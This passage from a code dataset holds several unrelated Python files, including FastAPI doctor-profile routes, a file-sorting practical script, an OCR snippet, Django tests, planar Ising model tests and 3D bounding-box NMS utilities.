APIRouter()\n\n\n@router.get('/profile/doctor/{user_id}')\nasync def get_doctor_profile(user_id: str, Authorize: AuthJWT = Depends()):\n \"\"\"\n Get data for doctor's profile\n\n :param user_id: Id of doctor in database\n :return: doctor data\n \"\"\"\n Authorize.jwt_required()\n doctor_profile = Repository.get_doctor_by_id(user_id)\n\n return {'data': doctor_profile, 'result': bool(doctor_profile)}\n\n\n@router.post('/doctors/search/')\nasync def get_doctors_by_filter(filter: dict, Authorize: AuthJWT = Depends()):\n \"\"\"\n Get doctors list by features for search engine.\n\n :param filter: dict (column:\"value\") of features to search for.\n :return: list of found doctors.\n \"\"\"\n Authorize.jwt_required()\n list_doctors = Repository.get_doctor_by_dict(filter)\n\n return list_doctors\n\n\n@router.get('/doctors/')\nasync def get_all_doctors(Authorize: AuthJWT = Depends()):\n \"\"\"\n Get all doctors from database\n\n :return: list of doctors\n \"\"\"\n Authorize.jwt_required()\n list_doctors = Repository.get_all_doctors()\n\n return {'data': list_doctors, 'result': bool(list_doctors)}\n","repo_name":"zelenyid/medicine_center","sub_path":"app/api/doctors.py","file_name":"doctors.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72777286201","text":"\"\"\"CP1404 Prac\nWalk given dir and Create dirs from file extensions in root;\n Move files into respective dirs\"\"\"\n\nimport os\nimport shutil\n\nROOT = r'.\\FilesToSort'\n\n\ndef main():\n \"\"\"Main loop for dir creation and file move\"\"\"\n 
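Both queue-based records above (the hot-potato game and the Baekjoon 11866 Josephus problem) simulate eliminations by cycling a `queue.Queue`. A `collections.deque` with `rotate` expresses the same idea more compactly; this sketch is an alternative formulation, not code from either repo:

```python
from collections import deque

def josephus_order(n: int, k: int) -> list[int]:
    """Order in which people 1..n are removed when every k-th person is eliminated."""
    people = deque(range(1, n + 1))
    order = []
    while people:
        people.rotate(-(k - 1))          # advance k-1 people to the back of the circle
        order.append(people.popleft())   # the k-th person is removed
    return order

# Matches the expected Baekjoon 11866 output for n=7, k=3: <3, 6, 2, 7, 5, 1, 4>
assert josephus_order(7, 3) == [3, 6, 2, 7, 5, 1, 4]
```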
extensions = []\n\n os.chdir(ROOT)\n root = \".\"\n\n for dirname, subdirs, filenames in os.walk('.'):\n print(\"Directory:\", dirname)\n print(\"\\tcontains subdirectories:\", subdirs)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n\n # Not efficient. is called in every subdirectory.\n create_file_ext_directories(root, extensions, filenames)\n # Tries to move files to non-existent dir\n move_files_to_ext_dirs(root, dirname, filenames)\n\n print(extensions)\n\n\ndef move_files_to_ext_dirs(root, dirname, filenames):\n \"\"\"Given a dir with name==ext, move file there\"\"\"\n for name in filenames:\n\n filename, ext = name.split(\".\")\n\n # shutil.move requires full path names\n filename = os.path.join(dirname, name)\n destination = os.path.join(root, ext)\n print(destination)\n\n try:\n shutil.move(filename, destination)\n print(name, \" moved to \", destination)\n except FileNotFoundError as error:\n print(error)\n except shutil.Error as error: # package Error\n # File exists - will not duplicate\n print(error)\n\n\ndef create_file_ext_directories(root, extensions, filenames):\n \"\"\"From os.walk() create dirs from set of extensions in dir\"\"\"\n for name in filenames:\n filename, ext = name.split('.')\n\n if ext not in extensions:\n extensions.append(ext)\n try:\n os.mkdir(os.path.join(root, ext))\n except FileExistsError:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Davvott/CP1404","sub_path":"prac_09/sort_files_1.py","file_name":"sort_files_1.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74976136760","text":"import cv2\nimport pytesseract\n\ndef extract():\n # Read the image using OpenCV\n image = cv2.imread(\"/home/gabriel/Desktop/python/groceryListProject/GroceryListProj/data/captured_image.jpg\") # Replace \"image.png\" with the path to your image file\n #cv2.imshow('Loaded Image', image)\n\n # Convert the image to grayscale (optional but can help with text extraction)\n #gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Use pytesseract to extract text from the grayscale image\n extracted_text = pytesseract.image_to_string(image, lang='eng')\n\n # Print the extracted text\n print(extracted_text)\n\ndef main():\n extract()\n\nif __name__ == '__main__':\n main()","repo_name":"Polymath3745/GroceryListProj","sub_path":"utils/interpret.py","file_name":"interpret.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30622874933","text":"#!/usr/bin/python\n# File Name : sieve_errors.py\n# Purpose : Analyze the types of errors that the Sieve is making.\n# Creation Date : 11-20-2013\n# Last Modified : Wed 29 Jan 2014 09:33:28 PM MST\n# Created By : Nathan Gilbert\n#\nimport sys\nimport collections\n\nfrom pyconcile import reconcile\nfrom pyconcile import utils\nimport specificity_utils\n\n#DONE: cases where the correct antecedent is further than 5 sentences away\n#TODO: cases where there is a closer \"same-semantic-type\" than the true\n# antecedent\n#TODO: cases where other heuristics are stopping the resolution -- may need to\n# look at other output\n#TODO: grab cases where no resolution is made\n\nclass Noun:\n def __init__(self, h):\n self.head = h\n self.instances = {} #doc:start:end -> text\n self.antecedents = {} #doc:start:end -> ante_text\n self.labels = {} #doc:start:end -> 
True/False\n        self.true_antecedent_distances = {} #doc:start:end -> sentence distance\n                                             # of closest true antecedent\n        self.resp_antecedent_distances = {} #doc:start:end -> sentence distance\n                                             # of response antecedent\n        self.incorrect_ante_sc = {} #doc:start:end -> #\n\n    def greaterThan5(self):\n        five = 0\n        for key in list(self.true_antecedent_distances.keys()):\n            if self.true_antecedent_distances[key] > 4:\n                five += 1\n        return five\n\n    def baseAntencedent(self):\n        ba = 0\n        for key in list(self.true_antecedent_distances.keys()):\n            if self.true_antecedent_distances[key] < 0 :\n                ba += 1\n        return ba\n\n    def count(self):\n        return len(list(self.instances.keys()))\n\n    def num_correct(self):\n        return len([x for x in list(self.labels.values()) if x == True])\n\ndef closest_antecedent(gold_chains, mention):\n    \"\"\"returns the closest antecedent in the text. if base antecedent,\n    returns None\"\"\"\n    #find this mention in gold chains\n    for key in list(gold_chains.keys()):\n        prev = None\n        for other in gold_chains[key]:\n            if mention == other:\n                return prev\n            else:\n                prev = other\n    return None\n\ndef getAnnotSentenceNum(sentences, annot):\n    \"\"\"return the integer of the sentence the annot is found in.\"\"\"\n    if annot is None:\n        return -1\n\n    i = 0\n    for s in sentences:\n        if s.contains(annot):\n            return i\n        i += 1\n    return -1\n\ndef getAnnotSemanticClass(nes, annot):\n    if annot is None:\n        return None\n    return nes.getAnnotBySpan(annot.getStart(), annot.getEnd())[\"NE_CLASS\"]\n\nif __name__ == \"__main__\":\n    if len(sys.argv) < 2:\n        print(\"Usage: %s <file-list> <faux-pronoun-file>\" % (sys.argv[0]))\n        sys.exit(1)\n\n    FAUX_PRONOUNS = []\n    with open(sys.argv[2], 'r') as fauxFile:\n        for line in fauxFile:\n            if line.startswith(\"#\"):\n                continue\n            line=line.strip()\n            FAUX_PRONOUNS.append(line)\n\n    PREDICTIONS = \"features.goldnps/predictions.StanfordSieve.all_commons/\"\n    #PREDICTIONS = \"features.goldnps/predictions.StanfordSieve.bare_definites/\"\n\n    files = []\n    tracked_nouns = {} #head -> Noun instance\n    with open(sys.argv[1], 'r') as fileList:\n        files.extend([x for x in fileList.readlines() if not x.startswith(\"#\")])\n\n    overall_sc_errors = {}\n    for f in files:\n        f=f.strip()\n        #print \"Working on file: {0}\".format(f)\n\n        #get the gold chains\n        gold_chains = reconcile.getGoldChains(f)\n        gold_nes = reconcile.getGoldNEs(f)\n\n        #get faux pronouns\n        try:\n            faux_pronoun_pairs = reconcile.getFauxPairs(f, PREDICTIONS)\n        except:\n            #then one was not created for this document (ACE04-33 is one.)\n            continue\n\n        #get the sentences \n        sentences = reconcile.getSentences(f)\n\n        #remove the pairs we don't care about\n        tracked_pairs = []\n        for pair in faux_pronoun_pairs:\n            ana_head = specificity_utils.getHead(pair[1].getText()).lower()\n            if ana_head in FAUX_PRONOUNS:\n                if ana_head not in list(tracked_nouns.keys()):\n                    tracked_nouns[ana_head] = Noun(ana_head)\n                tracked_pairs.append(pair)\n\n        #label the correct or incorrect pairs\n        labeled_faux_pairs = reconcile.labelCorrectPairs(gold_chains,\n                tracked_pairs)\n\n        for lpair in labeled_faux_pairs:\n            ana_head = specificity_utils.getHead(lpair[1].getText()).lower()\n            key = \"{0}:{1}:{2}\".format(f, lpair[1].getStart(),\n                    lpair[1].getEnd())\n\n            tracked_nouns[ana_head].instances[key] = utils.textClean(lpair[1].getText())\n            tracked_nouns[ana_head].antecedents[key] = utils.textClean(lpair[0].getText())\n            tracked_nouns[ana_head].labels[key] = lpair[2]\n\n            #this is an incorrect antecedent\n            if not lpair[2]:\n                closest_true_antecedent = closest_antecedent(gold_chains,\n                        lpair[1])\n\n                #deals with sentence 
distance\n resp_ant_sent = getAnnotSentenceNum(sentences, lpair[1])\n true_ant_sent = getAnnotSentenceNum(sentences, closest_true_antecedent)\n ana_sent = getAnnotSentenceNum(sentences, lpair[1])\n\n if closest_true_antecedent is not None:\n true_dist = ana_sent - true_ant_sent\n else:\n true_dist = -1\n resp_dist = ana_sent - resp_ant_sent\n\n tracked_nouns[ana_head].true_antecedent_distances[key] = true_dist\n tracked_nouns[ana_head].resp_antecedent_distances[key] = resp_dist\n\n #deals with semantic issues\n true_ant_sc = getAnnotSemanticClass(gold_nes,closest_true_antecedent)\n ana_sc = getAnnotSemanticClass(gold_nes, lpair[1])\n\n if (closest_true_antecedent is not None) and (true_ant_sc != ana_sc):\n #this case captures when the true antecedent has a\n #different semantic class than the anaphor\n tracked_nouns[ana_head].incorrect_ante_sc[key] = true_ant_sc\n else:\n #this captures the semantic class that caused the\n #incorrect resolution\n overall_sc_errors[ana_sc] = overall_sc_errors.get(ana_sc,0) + 1\n\n stn = sorted(list(tracked_nouns.values()), key=lambda x : x.count(), reverse=True)\n for tn in stn:\n print(\"Head: {0}\".format(tn.head))\n print(\"\\tresolutions: {0} / {1} = {2:.2f}\".format(tn.num_correct(), tn.count(),\n float(tn.num_correct()) / tn.count()))\n print(\"\\t>5 antecedents: {0}\".format(tn.greaterThan5()))\n print(\"\\tno antecedents: {0}\".format(tn.baseAntencedent()))\n print(\"\\tincorrect sem: {0}\".format(len(list(tn.incorrect_ante_sc.keys()))))\n\n incorrect = []\n for ant in list(tn.antecedents.keys()):\n if not tn.labels[ant]:\n incorrect.append(tn.antecedents[ant])\n most_common_incorrect = collections.Counter(incorrect).most_common(5)\n\n print(\"\\ttop 5 incorrect: {0}\".format(\", \".join([x[0] for x in most_common_incorrect])))\n print(\"=\"*72)\n\n total_sc_errors = sum(overall_sc_errors.values())\n for key in list(overall_sc_errors.keys()):\n print(\"{0:15} : {1:3} : {2:.2f}\".format(key, overall_sc_errors[key],\n float(overall_sc_errors[key]) / total_sc_errors))\n\n","repo_name":"nathan-gilbert/pyconcile","sub_path":"lexical_research_tools/specificity/sieve_errors.py","file_name":"sieve_errors.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70151925240","text":"from datetime import datetime, timedelta\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom apps.dashboard.models import EvaluationType, MaturityModelItem, EvaluationReport, EvaluationRequest\nfrom apps.dashboard.tests.utils import DjangoCurrentTimeMock, setup_basic_environment\nfrom apps.custom_scripts.evaluation_report_pruning import remove_repeater_evaluation_reports\n\n\nclass Test(TestCase):\n def setUp(self):\n self.env = setup_basic_environment()\n\n def test_burst_logically_equal_evaluation_reports_of_non_manual_items_should_be_reduced_to_one(self):\n evaluation_type_non_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_TEST_COVERAGE, # Arbitrary non-manual type\n validity_period_days=1,\n )\n self.mm_item_non_manual = MaturityModelItem.objects.create(\n code=\"N000\",\n name=\"Test Coverage\",\n evaluation_type=evaluation_type_non_manual,\n maturity_model_level=self.env.maturity_model_level,\n acceptable_value=\"50\"\n )\n non_manual_evaluation_reports = [\n self._create_non_manual_evaluation_report(60),\n self._create_non_manual_evaluation_report(60),\n self._create_non_manual_evaluation_report(70),\n ]\n\n 
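The `sieve_errors.py` record above tallies each noun's most frequent wrong antecedents with `collections.Counter.most_common`. A standalone sketch of that tallying pattern, using made-up antecedent strings rather than actual Reconcile output:

```python
from collections import Counter

# Hypothetical incorrect-antecedent texts gathered during error analysis.
incorrect = ["the company", "the firm", "the company", "officials",
             "the company", "the firm"]

top = Counter(incorrect).most_common(2)  # -> [('the company', 3), ('the firm', 2)]
print(", ".join(f"{text} ({count})" for text, count in top))
```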
remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_non_manual).count(), 2)\n first_non_manual_evaluation_report = EvaluationReport.objects.order_by('creation_time').first()\n self.assertEqual(first_non_manual_evaluation_report.creation_time, non_manual_evaluation_reports[0].creation_time)\n self.assertEqual(first_non_manual_evaluation_report.latest_evaluation_time, non_manual_evaluation_reports[1].latest_evaluation_time)\n\n def test_evaluation_reports_of_manual_items_should_not_be_deleted(self):\n evaluation_type_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_MANUAL,\n )\n self.mm_item_manual = MaturityModelItem.objects.create(\n code=\"M000\",\n name=\"Manual\",\n evaluation_type=evaluation_type_manual,\n maturity_model_level=self.env.maturity_model_level,\n )\n self._create_manual_evaluation_request_and_report(\"test 1\")\n self._create_manual_evaluation_request_and_report(\"test 1\")\n self._create_manual_evaluation_request_and_report(\"test 2\")\n\n remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_manual).count(), 3)\n\n def test_evaluation_report_should_not_be_merged_with_previous_evaluation_report_that_is_not_in_validity_period(self):\n validity_period_days = 1\n evaluation_type_non_manual = EvaluationType.objects.create(\n kind=EvaluationType.KIND_TEST_COVERAGE, # Arbitrary non-manual type\n validity_period_days=validity_period_days,\n )\n self.mm_item_non_manual = MaturityModelItem.objects.create(\n code=\"N000\",\n name=\"Test Coverage\",\n evaluation_type=evaluation_type_non_manual,\n maturity_model_level=self.env.maturity_model_level,\n acceptable_value=\"50\"\n )\n now = timezone.make_aware(datetime(2000, 1, 1))\n with DjangoCurrentTimeMock(now):\n self._create_non_manual_evaluation_report(current_value=\"60\")\n\n with DjangoCurrentTimeMock(now + timedelta(days=validity_period_days + 1)):\n self._create_non_manual_evaluation_report(current_value=\"60\")\n\n remove_repeater_evaluation_reports()\n\n self.assertEqual(EvaluationReport.objects.filter(maturity_model_item=self.mm_item_non_manual).count(), 2)\n\n def _create_non_manual_evaluation_report(self, current_value):\n evaluation_report = EvaluationReport.create_new(\n project=self.env.project,\n maturity_model_item=self.mm_item_non_manual,\n status=EvaluationReport.STATUS_PASS,\n current_value=current_value,\n )\n evaluation_report.save()\n evaluation_report.refresh_from_db()\n return evaluation_report\n\n def _create_manual_evaluation_request_and_report(self, description):\n EvaluationRequest.objects.create(\n project=self.env.project,\n maturity_model_item=self.mm_item_manual,\n applicant=self.env.user,\n )\n EvaluationReport.create_new(\n project=self.env.project,\n maturity_model_item=self.mm_item_manual,\n status=EvaluationReport.STATUS_PASS,\n description=description,\n ).save()\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/custom_scripts/tests/test_evaluation_pruning.py","file_name":"test_evaluation_pruning.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21465784059","text":"from marshmallow import ValidationError\n\n\ndef validate_lower_upper_fields(\n data: dict,\n lower_key: str,\n upper_key: str,\n message_case_none: str,\n message_case_bigger: str,\n):\n lower = data.get(lower_key, None)\n upper = data.get(upper_key, None)\n if 
(lower is None and upper is not None) or (lower is not None and upper is None):\n raise ValidationError(message_case_none)\n if lower is None and upper is None:\n return # Nothing to do here\n if lower > upper:\n raise ValidationError(message_case_bigger)\n","repo_name":"poh42/TDapp","sub_path":"utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15871966720","text":"import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport time\n\nfrom planar_ising import PlanarGraphGenerator, DecompGraph, \\\n DecompInferenceAndSampling, SmallInferenceAndSampling\n\nnp.random.seed(42)\nmatplotlib.rcParams.update({'font.size': 15})\n\n\ndef make_k5():\n\n return np.array([[0, 1], [0, 2], [0, 3], [0, 4], [1, 2],\n [1, 3], [1, 4], [2, 3], [2, 4], [3, 4]])\n\ndef generate_k33free_graph(size):\n\n graph = DecompGraph()\n graph.add_component(True, make_k5())\n graph_size = 5\n\n while graph_size != size:\n\n parent_index = np.random.choice(graph.nodes_count)\n parent_node = graph.nodes[parent_index]\n \n if graph.is_small_node[parent_index]:\n parent_edges_count = parent_node.shape[0]\n else:\n parent_edges_count = parent_node.edges_count\n\n parent_virtual_edge_index = np.random.choice(parent_edges_count)\n\n if graph.is_small_node[parent_index]:\n parent_connection_vertices = parent_node[parent_virtual_edge_index]\n else:\n parent_connection_vertices = \\\n np.array([parent_node.edges.vertex1[parent_virtual_edge_index],\n parent_node.edges.vertex2[parent_virtual_edge_index]])\n\n if graph_size + 3 <= size and np.random.rand() > 0.5:\n\n node = make_k5()\n edges_count = 10\n\n graph.add_component(True, node)\n graph_size += 3\n\n else:\n\n new_vertices_count = 1 + np.random.choice(size - graph_size)\n\n node = PlanarGraphGenerator.generate_random_graph(new_vertices_count + 2, 1.0)\n edges_count = node.edges_count\n\n graph.add_component(False, node)\n graph_size += new_vertices_count\n \n node_index = graph.nodes_count - 1\n\n virtual_edge_index = np.random.choice(edges_count)\n\n if graph.is_small_node[node_index]:\n connection_vertices = node[virtual_edge_index]\n else:\n connection_vertices = np.array([node.edges.vertex1[virtual_edge_index],\n node.edges.vertex2[virtual_edge_index]])\n \n graph.add_connection(parent_index, node_index, parent_connection_vertices,\n connection_vertices)\n\n graph.enumerate()\n\n return graph\n\ndef simulate_and_test_logpf_computation(interaction_values_std):\n\n start = time.time()\n \n sizes = np.arange(10, 16)\n\n models_per_size = 1000\n\n maximal_relative_error = 0.0\n\n for size in sizes:\n for sample_index in range(models_per_size):\n\n graph = generate_k33free_graph(size)\n inference = DecompInferenceAndSampling(graph)\n inference.prepare()\n\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n logpf, marginals = inference.compute_logpf(interaction_values,\n with_marginals=True)\n\n bf_inference = SmallInferenceAndSampling(graph.get_edges(),\n np.array([], dtype=int))\n bf_logpf, bf_marginals = bf_inference.compute_logpf(interaction_values,\n np.array([], dtype=int), with_marginals=True)\n\n relative_error = np.absolute((logpf - bf_logpf)/bf_logpf)\n\n if relative_error > maximal_relative_error:\n maximal_relative_error = relative_error\n\n relative_error = np.linalg.norm(marginals - bf_marginals)/\\\n np.linalg.norm(bf_marginals)\n\n if 
relative_error > maximal_relative_error:\n maximal_relative_error = relative_error\n\n print('{0} random models of sizes {1} were evaluated.'.format(\n models_per_size*len(sizes), tuple(sizes)))\n print('Maximal relative error is {}.'.format(maximal_relative_error))\n print('{:.2f} seconds passed'.format(time.time() - start))\n\ndef collect_kl_statistics(interaction_values_std, model_sizes, models_per_size,\n sample_log2_sizes):\n\n kl_divergences = []\n\n start = time.time()\n \n for size in model_sizes:\n\n print('size', size)\n\n kl_divergences.append([])\n\n for model_index in range(models_per_size):\n\n kl_divergences[-1].append([])\n\n graph = generate_k33free_graph(size)\n edges = graph.get_edges()\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n inference_and_sampling = DecompInferenceAndSampling(graph)\n inference_and_sampling.prepare(sampling=True)\n\n logpf = inference_and_sampling.compute_logpf(interaction_values)\n\n previous_sample_size = 0\n\n configuration_counts = {}\n \n for sample_size in 2**sample_log2_sizes:\n\n configurations = \\\n inference_and_sampling.sample_spin_configurations(sample_size - \\\n previous_sample_size, interaction_values)\n\n for configuration in configurations:\n\n configuration = tuple(configuration)\n\n if configuration not in configuration_counts:\n configuration_counts[configuration] = 0\n\n configuration_counts[configuration] += 1\n\n kl_divergence = 0.0\n\n for configuration, count in configuration_counts.items():\n\n spins = np.array(configuration)\n\n minus_energy = (interaction_values*spins[edges[:, 0]]*\\\n spins[edges[:, 1]]).sum()\n\n true_logprob = minus_energy - logpf\n\n empirical_prob = count/sample_size\n\n kl_divergence += empirical_prob*(np.log(empirical_prob) - true_logprob)\n\n kl_divergences[-1][-1].append(kl_divergence)\n\n previous_sample_size = sample_size\n\n print('\\tdone with model {0}, {1:.2f} min.'.format(model_index + 1,\n (time.time() - start)/60))\n\n return np.array(kl_divergences)\n\ndef draw_kl_statistics(model_sizes, sample_log2_sizes, kl_statistics):\n\n figure = plt.figure(figsize=(8, 5), dpi=100)\n\n colors = ['r', 'g', 'b', 'c', 'm', 'y']\n\n for size_kl_statistics, size, color in zip(kl_statistics, model_sizes, colors):\n\n on_first_plot = True\n\n for model_kl_statistics in size_kl_statistics:\n\n plot_kwargs = {\n 'zorder': 0\n }\n\n if on_first_plot:\n plot_kwargs['label'] = 'N={}'.format(size)\n \n plt.plot(sample_log2_sizes, model_kl_statistics, color + '--',\n **plot_kwargs)\n plt.scatter(sample_log2_sizes, model_kl_statistics, color='k', s=10,\n zorder=1)\n\n on_first_plot = False\n\n plt.xlabel('$\\log_2 M$')\n plt.ylabel('KL-divergence')\n plt.legend()\n\n figure.savefig('k33free_kl.pdf', bbox_inches='tight')\n\ndef measure_execution_times(interaction_values_std, model_log2_sizes, models_per_size):\n\n execution_times = []\n\n main_start = time.time()\n \n for size in 2**model_log2_sizes:\n\n execution_times.append([])\n\n for model_index in range(models_per_size):\n\n graph = generate_k33free_graph(size)\n interaction_values = np.random.normal(scale=interaction_values_std,\n size=graph.edges_count)\n\n inference_and_sampling = DecompInferenceAndSampling(graph)\n\n start = time.time()\n inference_and_sampling.prepare()\n inference_and_sampling.compute_logpf(interaction_values)\n inference_time = time.time() - start\n\n start = time.time()\n inference_and_sampling.prepare(sampling=True)\n inference_and_sampling.sample_spin_configurations(1, 
interaction_values)\n sampling_time = time.time() - start\n\n execution_times[-1].append([inference_time, sampling_time])\n\n print('done with size {0}, {1:.2f} min.'.format(size, (time.time() - main_start)/60))\n\n return np.array(execution_times)\n\ndef draw_execution_times(model_log2_sizes, models_per_size, execution_times):\n\n figure = plt.figure(figsize=(8, 5), dpi=100)\n\n inference_times = execution_times[:, :, 0].ravel()\n sampling_times = execution_times[:, :, 1].ravel()\n\n model_log2_sizes_per_point = np.repeat(model_log2_sizes, models_per_size)\n\n plt.scatter(model_log2_sizes_per_point, np.log2(inference_times), color='r', s=10,\n label='inference')\n plt.scatter(model_log2_sizes_per_point, np.log2(sampling_times), color='b', s=10,\n label='sampling')\n\n theoretical_complexity_points = 3*model_log2_sizes/2 - 7\n\n plt.plot(model_log2_sizes, theoretical_complexity_points, c='k',\n label='$O(N^{1.5})$')\n\n plt.xlabel('$\\log_2 N$')\n plt.ylabel('$\\log_2$(sec.)')\n plt.legend()\n\n figure.savefig('k33free_time.pdf', bbox_inches='tight')\n\nif __name__ == '__main__':\n\n interaction_values_std = 0.1\n\n simulate_and_test_logpf_computation(interaction_values_std)\n print()\n\n model_sizes = np.array([10, 25, 40])\n models_per_size = 10\n sample_log2_sizes = np.arange(1, 12)\n\n kl_statistics = collect_kl_statistics(interaction_values_std, model_sizes,\n models_per_size, sample_log2_sizes)\n print()\n draw_kl_statistics(model_sizes, sample_log2_sizes, kl_statistics)\n\n model_log2_sizes = np.arange(3, 12)\n models_per_size = 10\n\n execution_times = measure_execution_times(interaction_values_std, model_log2_sizes,\n models_per_size)\n draw_execution_times(model_log2_sizes, models_per_size, execution_times)\n","repo_name":"ValeryTyumen/planar_ising","sub_path":"tests/k33free_tests.py","file_name":"k33free_tests.py","file_ext":"py","file_size_in_byte":9781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"1680263625","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom goods.views import index_redirect\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^goods/', include('goods.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^$', index_redirect, name='index_redirect'),\n)\n","repo_name":"Effessio/catalog","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36048798520","text":"import logging\n\nimport numpy as np\nimport torch\nfrom pytorch3d.transforms import transform3d as t3d\n\nfrom detectron2.layers.nms import batched_nms_rotated\nfrom detectron2.structures import RotatedBoxes\n\nfrom tridet.structures.pose import Pose\n\nLOG = logging.getLogger(__name__)\n\n# yapf: disable\n# -------------------------------\n# Convention of reference frames.\n# -------------------------------\n# Rotation from \"camera\" frame to \"vehicle\" frame.\n# |------------------|--------------------------------|\n# | Camera | Vehicle | Interpretation in Vehicle frame|\n# |------------------|--------------------------------|\n# | z | x | forward |\n# | x | -y | right |\n# | y | -z | down |\n# |------------------|--------------------------------|\nCAMERA_TO_VEHICLE_ROTATION = Pose.from_matrix(np.float32([\n [ 0, 0, 1, 0],\n [-1, 0, 0, 0],\n [ 0, -1, 0, 0],\n [ 0, 0, 0, 1]\n]))\n\n# 
Rotation from \"vehicle\" frame to \"bev\" frame.\n# |------------------|---------------------------------|\n# |     Vehicle      |   BEV  | Interpretation in Vehicle frame |\n# |------------------|---------------------------------|\n# |        x         |   -y   |     forward     |\n# |        y         |   -x   |      left       |\n# |        z         |   -z   |       up        |\n# |------------------|---------------------------------|\nVEHICLE_TO_BEV_ROTATION = Pose.from_matrix(np.float32([\n    [ 0, -1,  0, 0],\n    [-1,  0,  0, 0],\n    [ 0,  0, -1, 0],\n    [ 0,  0,  0, 1]\n]))\n# yapf: enable\n\n\ndef boxes3d_to_rotated_boxes(\n    boxes3d, pose_cam_global=CAMERA_TO_VEHICLE_ROTATION, pose_global_bev=VEHICLE_TO_BEV_ROTATION, use_top_surface=True\n):\n    \"\"\"\n\n    Parameters\n    ----------\n    boxes3d: Boxes3D\n        3D boxes in camera frame.\n    pose_cam_global: Pose\n        Transformation from sensor (camera) frame to global frame. Depending on the context, global frame can be\n        \"vehicle\" frame which moves along with the vehicle, or \"world\" frame which is fixed in the world.\n        By default, it is an axis-swapping rotation that converts pinhole camera frame to Vehicle frame, i.e.\n            x: forward, y: left, z: up (see above for detail.)\n        with no translation (i.e. moves along with camera).\n    pose_global_bev: Pose\n        Transformation from global frame to bird-eye-view frame. By default, \"forward\" matches with \"up\" of the BEV image.\n        By default, it is an axis-swapping rotation that converts Vehicle frame to BEV frame (see above for detail.)\n        with no translation.\n    \"\"\"\n    if use_top_surface:\n        vertice_inds = [0, 1, 5, 4]  # (front-left, front-right, back-right, back-left) of top surface.\n    else:\n        # use bottom surface.\n        vertice_inds = [3, 2, 6, 7]  # (front-left, front-right, back-right, back-left) of bottom surface.\n\n    surface = boxes3d.corners[:, vertice_inds, :]\n    pose_cam_bev = pose_global_bev * pose_cam_global\n    cam_to_bev = t3d.Transform3d(matrix=surface.new_tensor(pose_cam_bev.matrix.T))  # Need to transpose!\n    # Assumption: this is close to rectangles. TODO: assert it?\n    rot_boxes_bev = cam_to_bev.transform_points(surface)[:, :, :2]\n\n    # length/width of objects are equivalent to \"height\"/width of RotatedBoxes\n    length = torch.norm(rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 3, :], dim=1).abs()\n    width = torch.norm(rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 1, :], dim=1).abs()\n\n    center = torch.mean(rot_boxes_bev[:, [0, 2], :], dim=1)\n    center_x, center_y = center[:, 0], center[:, 1]\n\n    forward = rot_boxes_bev[:, 0, :] - rot_boxes_bev[:, 3, :]\n    # CCW-angle, i.e. rotation wrt -z (or \"up\") in BEV frame.\n    angle = torch.atan2(forward[:, 0], forward[:, 1])\n    angle = 180. / np.pi * angle\n\n    rot_boxes = RotatedBoxes(torch.stack([center_x, center_y, width, length, angle], dim=1))\n    return rot_boxes\n\n\ndef bev_nms(\n    boxes3d, scores, iou_threshold, pose_cam_global=CAMERA_TO_VEHICLE_ROTATION, class_idxs=None, class_agnostic=False\n):\n    \"\"\"\n\n    Parameters\n    ----------\n    boxes3d: Boxes3D\n        3D boxes in camera frame.\n\n    scores: Tensor\n        1D score vector. Must be of same size 'boxes3d'\n\n    iou_threshold: float\n        Two rotated boxes in BEV frame cannot overlap (according to IoU) more than this threshold.\n\n    class_idxs: Tensor or None\n        If not None, 1D integer vector. 
